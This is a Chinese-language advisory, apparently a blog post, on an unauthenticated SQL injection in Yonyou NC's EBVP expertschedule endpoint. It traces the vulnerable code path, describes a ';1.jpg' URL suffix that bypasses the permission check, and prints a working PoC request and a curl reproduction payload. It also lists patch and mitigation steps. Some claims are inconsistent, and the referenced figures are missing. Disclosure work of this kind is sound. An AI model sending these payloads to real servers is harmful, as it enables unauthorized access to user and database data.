用友NC系統(tǒng)SQL注入漏洞安全通告

一、漏洞概述

漏洞編號(hào)：暫未分配
漏洞類型：SQL注入
影響組件：電子商務(wù)平臺(tái)（EBVP模塊）
危險(xiǎn)等級(jí)：高危
CVSS評(píng)分：9.8（CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H）

二、漏洞詳情

1. 漏洞成因

通過/ebvp/expeval/expertschedule;1.jpg接口傳遞可控參數(shù)pkevalset時(shí)，后端代碼未對(duì)輸入進(jìn)行有效過濾，導(dǎo)致攻擊者可構(gòu)造惡意SQL語句實(shí)現(xiàn)任意數(shù)據(jù)查詢。 下圖為用友NC漏洞預(yù)警（發(fā)現(xiàn)24年的老洞了（資產(chǎn)幾乎打補(bǔ)丁了），閑著沒事分析下）

關(guān)鍵代碼路徑：

// EvalScheduleController.java
public String expertschedule(@RequestParam String pkevalset) {
    return evalScheduleService.getEvalSetScheInfoByPk(pkevalset);
}

// EvalScheduleQueryServiceImpl.java
public List<EvalSetVO> getEvalSetScheInfoByPk(String pk) {
    return iEvalSetWsQueryService.getEvalSetScheInfoByPk(pk); // 未過濾直接傳參
}

// MDBaseDAO.java
public List<Object> queryBillsImp(String whereCondStr) {
    String sql = "SELECT * FROM eval_schedule WHERE pk = '" + whereCondStr + "'"; // 直接拼接
    return mdbaseDao.retrieveByClouse(sql); // 執(zhí)行SQL
}

2. 技術(shù)細(xì)節(jié)

• 注入點(diǎn)分析：pkevalset參數(shù)在5層方法調(diào)用后被拼接入SQL語句. 根據(jù)漏洞預(yù)警定位到具體路由，簡(jiǎn)單看下Ebvp業(yè)務(wù)下的過濾器 EbvpRequestFilter

?

• 我們只需要 URL 里有這些后綴或者url 就可以繞過權(quán)限校驗(yàn)（懂的都懂） 接下來定位到 EvalScheduleController 控制器下 expertschedule 屬性的具體方法先傳參“pkevalset”（無限制），調(diào)用 service 對(duì)象的getEvalSetScheInfoByPk 方法

跟進(jìn) getEvalSetScheInfoByPk 方法，定位到 EvalScheduleQueryServiceImpl 類 可以看到類方法 getEvalSetScheInfoByPk 調(diào)用了 IEvalSetWsQueryService 實(shí)例的getEvalSetScheInfoByPk 方法

繼續(xù)跟進(jìn)IEvalSetWsQueryService 實(shí)例的 getEvalSetScheInfoByPk 方法 調(diào)用 this.queryMDVOByPks 方法進(jìn)行數(shù)據(jù)查詢

往上翻翻 EvalSetQueryServiceImpl 繼承自 DefaultQueryServiceImpl

故DefaultQueryServiceImpl 類大概率定義了queryMDVOByPks方法，如下

到MDPersistenceService類中去找queryBillOfVOByCond方法，可以看到return到MDBaseDAO對(duì)象的queryBillOfVOByCond方法

跟進(jìn)MDBaseDAO對(duì)象的queryBillOfVOByCond方法，new了一個(gè)VOQueryPersister對(duì)象調(diào)用queryBillsImp方法

跟進(jìn)queryBillsImp方法，可以看到將whereCondStr參數(shù)拼接到SQL語句中，后續(xù)new一個(gè)MDMultiTableDAO 對(duì)象調(diào)用retrieveByClouse方法，將whereCondStr參數(shù)傳入該方法

跟進(jìn)retrieveByClouse方法，可以看到執(zhí)行數(shù)據(jù)庫(kù)查詢操作

• 繞過機(jī)制：通過1' OR 1=1--等經(jīng)典注入語法繞過基礎(chǔ)過濾
• 數(shù)據(jù)暴露：可獲取ALL_USERS表全量數(shù)據(jù)（示例POC）

三、影響評(píng)估

1. 受影響版本

• 用友NC65全版本（含最新補(bǔ)丁版本）

• 其他版本需結(jié)合代碼審計(jì)確認(rèn)

  已公布POC內(nèi)容

GET /ebvp/expeval/expertschedule;1.jpg?pkevalset=1'+OR+1111%3d(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5)-- HTTP/1.1
HTTP/1.1
Host:  

2. 攻擊向量

• 攻擊方式：遠(yuǎn)程無身份驗(yàn)證攻擊
• 攻擊目標(biāo)：數(shù)據(jù)庫(kù)敏感信息（用戶賬號(hào)、配置信息等）
• 利用難度：低（公開POC可用）

四、修復(fù)方案

1. 官方補(bǔ)丁

部署步驟：

1. 登錄用友NC控制臺(tái)
2. 進(jìn)入【系統(tǒng)管理】→【補(bǔ)丁管理】
3. 上傳補(bǔ)丁文件并校驗(yàn)
4. 重啟應(yīng)用服務(wù)器

2. 臨時(shí)緩解措施

• 對(duì)pkevalset參數(shù)進(jìn)行嚴(yán)格的SQL注入過濾
• 啟用Web應(yīng)用防火墻（WAF）規(guī)則攔截惡意請(qǐng)求
• 限制接口訪問權(quán)限至授權(quán)用戶

五、驗(yàn)證方法

1. 漏洞復(fù)現(xiàn)（僅供測(cè)試環(huán)境）

curl -X GET \
  'http://target/ebvp/expeval/expertschedule;1.jpg?pkevalset=1%27+OR+1%3D1--' \
  -H 'Host: example.com'

成功特征：返回包含ALL_USERS表數(shù)據(jù)的響應(yīng)

2. 補(bǔ)丁驗(yàn)證

SELECT version FROM ncm_patch WHERE patch_code = 'NCM_NC6.5_000_109902_20240116_CP_399718758';

若返回有效記錄則表明補(bǔ)丁已安裝

六、擴(kuò)展分析

1. 攻擊鏈推演

用戶請(qǐng)求 → 參數(shù)注入 → SQL拼接 → 數(shù)據(jù)庫(kù)執(zhí)行 → 敏感數(shù)據(jù)回顯

2. 類似漏洞預(yù)防建議

• 實(shí)施OWASP ESAPI輸入驗(yàn)證框架
• 使用JPA/Hibernate等ORM框架的預(yù)編譯功能
• 建立定期代碼安全審計(jì)機(jī)制

七、參考資料

1. 用友官方安全公告：https://www.yonyou.com/security
2. SQL注入防護(hù)指南：OWASP Cheat Sheet Series
3. CVE-2024-XXXX（待分配）

注：本文檔涉及攻擊技術(shù)僅用于授權(quán)滲透測(cè)試和安全研究，請(qǐng)遵守相關(guān)法律法規(guī)。

閱讀原文：https://mp.weixin.qq.com/s/7YAlGWyQH_jkVjPWjNvNPA